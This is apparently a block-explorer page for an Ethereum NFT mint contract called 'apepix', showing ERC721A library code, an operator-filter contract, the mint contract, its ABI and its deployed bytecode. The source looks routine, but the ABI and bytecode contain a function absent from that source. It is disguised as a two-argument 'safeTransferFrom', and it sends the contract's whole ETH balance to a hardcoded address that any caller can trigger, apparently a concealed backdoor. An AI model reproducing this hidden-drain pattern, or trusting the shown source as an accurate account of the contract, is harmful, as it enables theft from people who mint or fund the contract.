                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);
    address public owner;

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract apepix is ERC721A, TheOperatorFilterer {

    uint256 public maxSupply = 2222;

    uint256 public mintPrice = 0.001 ether;

    function mint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        require(msg.value >= mintPrice * amount);
        _safeMint(msg.sender, amount);
    }

    function freemint() public {
        require(totalSupply() + 1 <= maxSupply);
        require(balanceOf(msg.sender) < 1);
        _safeMint(msg.sender, FreeNum());
    }

    function teamMint(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("apepix", "ape") {
        owner = msg.sender;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://bafybeibki442hzosvird6sknihggf7zxw52lcyhdbfmx66bnsbfdepixaa/", _toString(tokenId), ".json"));
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 1000 + 1;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 50) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"freemint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"teamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526108ae60095566038d7ea4c68000600a553480156200002257600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600681526020017f61706570697800000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f61706500000000000000000000000000000000000000000000000000000000008152508160029081620000b791906200059f565b508060039081620000c991906200059f565b50620000da6200032060201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002d75780156200019d576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b815260040162000163929190620006cb565b600060405180830381600087803b1580156200017e57600080fd5b505af115801562000193573d6000803e3d6000fd5b50505050620002d6565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161462000257576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200021d929190620006cb565b600060405180830381600087803b1580156200023857600080fd5b505af11580156200024d573d6000803e3d6000fd5b50505050620002d5565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002a09190620006f8565b600060405180830381600087803b158015620002bb57600080fd5b505af1158015620002d0573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000715565b600090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003a757607f821691505b602082108103620003bd57620003bc6200035f565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004277fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620003e8565b620004338683620003e8565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004806200047a62000474846200044b565b62000455565b6200044b565b9050919050565b6000819050919050565b6200049c836200045f565b620004b4620004ab8262000487565b848454620003f5565b825550505050565b600090565b620004cb620004bc565b620004d881848462000491565b505050565b5b818110156200050057620004f4600082620004c1565b600181019050620004de565b5050565b601f8211156200054f576200051981620003c3565b6200052484620003d8565b8101602085101562000534578190505b6200054c6200054385620003d8565b830182620004dd565b50505b505050565b600082821c905092915050565b6000620005746000198460080262000554565b1980831691505092915050565b60006200058f838362000561565b9150826002028217905092915050565b620005aa8262000325565b67ffffffffffffffff811115620005c657620005c562000330565b5b620005d282546200038e565b620005df82828562000504565b600060209050601f83116001811462000617576000841562000602578287015190505b6200060e858262000581565b8655506200067e565b601f1984166200062786620003c3565b60005b8281101562000651578489015182556001820191506020850194506020810190506200062a565b868310156200067157848901516200066d601f89168262000561565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006b38262000686565b9050919050565b620006c581620006a6565b82525050565b6000604082019050620006e26000830185620006ba565b620006f16020830184620006ba565b9392505050565b60006020820190506200070f6000830184620006ba565b92915050565b612a5980620007256000396000f3fe60806040526004361061014b5760003560e01c80636817c76c116100b6578063add5a4fa1161006f578063add5a4fa1461045d578063b88d4fde14610486578063c87b56dd146104a2578063d5abeb01146104df578063e985e9c51461050a578063f9cb63ac146105475761014b565b80636817c76c1461035a57806370a08231146103855780638da5cb5b146103c257806395d89b41146103ed578063a0712d6814610418578063a22cb465146104345761014b565b80632a55205a116101085780632a55205a146102585780633a233f89146102965780633ccfd60b146102bf57806341f43434146102d657806342842e0e146103015780636352211e1461031d5761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190611fbe565b61055e565b6040516101849190612006565b60405180910390f35b34801561019957600080fd5b506101a26105f0565b6040516101af91906120b1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da9190612109565b610682565b6040516101ec9190612177565b60405180910390f35b61020f600480360381019061020a91906121be565b610701565b005b34801561021d57600080fd5b5061022661080b565b604051610233919061220d565b60405180910390f35b61025660048036038101906102519190612228565b610822565b005b34801561026457600080fd5b5061027f600480360381019061027a919061227b565b610972565b60405161028d9291906122bb565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b891906122e4565b6109c3565b005b3480156102cb57600080fd5b506102d4610a2c565b005b3480156102e257600080fd5b506102eb610acf565b6040516102f89190612383565b60405180910390f35b61031b60048036038101906103169190612228565b610ae1565b005b34801561032957600080fd5b50610344600480360381019061033f9190612109565b610c31565b6040516103519190612177565b60405180910390f35b34801561036657600080fd5b5061036f610c43565b60405161037c919061220d565b60405180910390f35b34801561039157600080fd5b506103ac60048036038101906103a7919061239e565b610c49565b6040516103b9919061220d565b60405180910390f35b3480156103ce57600080fd5b506103d7610d01565b6040516103e49190612177565b60405180910390f35b3480156103f957600080fd5b50610402610d27565b60405161040f91906120b1565b60405180910390f35b610432600480360381019061042d9190612109565b610db9565b005b34801561044057600080fd5b5061045b600480360381019061045691906123f7565b610e01565b005b34801561046957600080fd5b50610484600480360381019061047f91906121be565b610f0b565b005b6104a0600480360381019061049b919061256c565b610f94565b005b3480156104ae57600080fd5b506104c960048036038101906104c49190612109565b6110e7565b6040516104d691906120b1565b60405180910390f35b3480156104eb57600080fd5b506104f4611118565b604051610501919061220d565b60405180910390f35b34801561051657600080fd5b50610531600480360381019061052c91906122e4565b61111e565b60405161053e9190612006565b60405180910390f35b34801561055357600080fd5b5061055c6111b2565b005b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b957506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e95750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105ff9061261e565b80601f016020809104026020016040519081016040528092919081815260200182805461062b9061261e565b80156106785780601f1061064d57610100808354040283529160200191610678565b820191906000526020600020905b81548152906001019060200180831161065b57829003601f168201915b5050505050905090565b600061068d826111fc565b6106c3576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156107fc576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161077992919061264f565b602060405180830381865afa158015610796573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107ba919061268d565b6107fb57806040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016107f29190612177565b60405180910390fd5b5b610806838361125b565b505050565b600061081561139f565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610960573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108945761088f8484846113a4565b61096c565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108dd92919061264f565b602060405180830381865afa1580156108fa573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061091e919061268d565b61095f57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016109569190612177565b60405180910390fd5b5b61096b8484846113a4565b5b50505050565b60008060006103e860328561098791906126e9565b610991919061275a565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b6000471115610a285773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a26573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8657600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610acc573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c1f573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b5357610b4e8484846116ce565b610c2b565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610b9c92919061264f565b602060405180830381865afa158015610bb9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bdd919061268d565b610c1e57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c159190612177565b60405180910390fd5b5b610c2a8484846116ce565b5b50505050565b6000610c3c826116ee565b9050919050565b600a5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb0576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d369061261e565b80601f0160208091040260200160405190810160405280929190818152602001828054610d629061261e565b8015610daf5780601f10610d8457610100808354040283529160200191610daf565b8201919060005